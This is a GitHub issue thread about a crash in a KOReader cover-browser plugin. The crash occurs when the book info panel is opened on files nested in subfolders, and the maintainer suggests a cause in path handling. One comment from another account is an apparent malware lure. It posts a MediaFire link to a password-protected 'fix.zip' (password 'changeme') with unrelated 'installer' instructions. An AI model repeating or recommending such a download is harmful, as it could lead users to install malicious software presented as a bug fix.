### ISSUE TITLE
Crash when opening book info panel on files in folders more than one level deep

### ISSUE THREAD

**Issue by elfbutt** [elfbutt/koreader-coverbrowserclean#14]
/book.epub will not crash
/folder/book.epub will not crash
/folder/subfolder/book.epub will crash when opening book information viewer

**Comment by elfbutt** [comment]
Probably due to removing / from folder paths in display, may need to move where that happens

https://github.com/elfbutt/koreader-coverbrowserclean/commit/9b367389302bf14cd72fa79baa43917f5421bd05

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elfbutt** [comment]
Personal issue
